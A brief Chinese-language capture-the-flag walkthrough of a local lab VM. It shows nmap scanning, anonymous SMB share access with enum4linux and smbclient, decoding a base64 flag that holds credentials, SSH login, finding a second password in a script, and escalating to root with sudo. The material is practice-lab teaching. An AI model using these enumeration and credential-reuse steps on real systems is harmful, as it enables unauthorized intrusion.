靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机IP为192.168.112.139
目录扫描
访问浏览器
smb访问
enum4linux 192.168.112.139
发现有一个wave共享
密码尝试空密码
smbclient //192.168.112.139/wave
连接成功
ls发现有一个flag文件
下载下来
cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
进行base64解码
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open
发现了账号密码
getshell
ssh连接
ssh wavex@192.168.112.139
连接成功
提权
sudo -l发现没有免密操作
cat /usr/share/av/westsidesecret/ififoregt.sh
发现账号密码
账号:aveng
密码:kaizen+80
su aveng
sudo -l发现all all
直接sudo su
提权成功